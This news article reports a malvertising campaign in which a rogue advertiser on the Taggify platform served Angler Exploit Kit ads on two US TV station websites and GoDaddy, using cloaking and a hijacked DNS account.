Ack! I’ve been poisoned

A rogue advertiser abused the Taggify self-serve ad platform to inject malware-installing code into browsers visiting the websites of two US TV stations.
It was a textbook malvertising attack: to infect victims’ PCs, the dodgy ads used the Angler Exploit Kit, which is a grab bag of code that exploits weaknesses in Adobe Flash and browsers’ JavaScript engines to install spyware and other software nasties on computers.

The ads were then served via the Taggify network to web surfers who visited domain registrar GoDaddy and CBS affiliated TV stations WBTV in Charlotte, North Carolina, and KMOV in St Louis.
Hacker-controlled servers hosted the malicious ad components – the JavaScript, images, Flash files, etc – as well as clean adverts to camouflage the dodgy banners. Whether the servers dished out bad or good ads depended on various factors, including the time of day, the browser’s user-agent string, and the victim’s IP address.

This behavior is designed to make the attack more difficult to detect.
In this case, the web domain name used by the malvertisers was parked, meaning its name was registered but it was serving no relevant content, while one of its subdomains hosted the ads.

A GoDaddy DNS account was hijacked to set up this arrangement.
Malwarebytes is due to publish more details on the malvertising scam, unravelled by crack security researcher Jerome Segura, on its blog today. ®

Sponsored:
Rise of the machines